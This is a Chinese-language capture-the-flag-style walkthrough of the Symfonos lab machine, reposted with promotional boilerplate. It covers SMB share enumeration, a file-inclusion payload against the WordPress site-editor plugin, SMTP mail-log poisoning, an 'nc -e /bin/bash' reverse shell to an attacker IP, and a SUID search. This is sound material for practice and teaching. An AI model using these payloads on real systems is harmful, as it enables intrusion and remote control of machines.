Symfonos靶场打靶记录
2022-9-20 10:54:41 Author: 渗透安全团队(查看原文) 阅读量:11 收藏

免责声明
由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号狐狸说安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!

0x01 信息收集阶段

1.arp-scan -l 扫描主机【IP以实际IP为准】

2.nmap扫描端口,发现smtp,http,samba服务开放

登录web

3.-L:显示服务器端所分享出来的所有资源;发现共享文件helios和anonymous

0x02 渗透测试阶段

4.指定anonymous用户以guest身份登录

ls发现存在attention.txt文件,get下载文件 查看attention.txt发现三个疑似密码epliioko qwerty baseball

5.指定helios用户登录

发现存在research.txt和todo.txt文件,下载到本地

6.查看todo.txt,发现疑似url路径

7.尝试登录url路径

修改/etc/hosts文件,添加一行解析

发现可以正常访问

8.wpscan工具扫描

因为工具需要联网,场景中不能使用。直接给出结果,扫描到存在site-editor插件,版本1.1.1

wpscan --url http://symfonos.local/h3l105/ --enumeratep,t,tt,cb,dbe,u,m

9、site-editor存在文件包含漏洞,输入payload

http://<host>/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

10.通过telnet连接smtp25端口,发送php文件。

11.测试是否发送成功

http://<host>/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?=/var/mail/helios&c=id

12.反弹shell

&c=nc -e /bin/bash 10.10.210.199 7777

13.攻击机监听获得shell

0x02 提权阶段

14.查找suid文件

find / -perm -u=s 2>/dev/null

15.提权

16.寻找flag文件

星 球 免 费 福 利

 转发公众号本文到朋友圈获取抽奖资格

 点击下方小程序图片完成抽奖

星球的最近主题和星球内部工具一些展示

欢 迎 加 入 星 球 !

关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247492645&idx=2&sn=7de38943a02540b318b6a18c0f0fb43e&chksm=c176198af601909c87bca42f4581d1f1b10b5aee32407f3070289aacd94af01dfb4f2c21ce5c#rd
如有侵权请联系:admin#unsafe.sh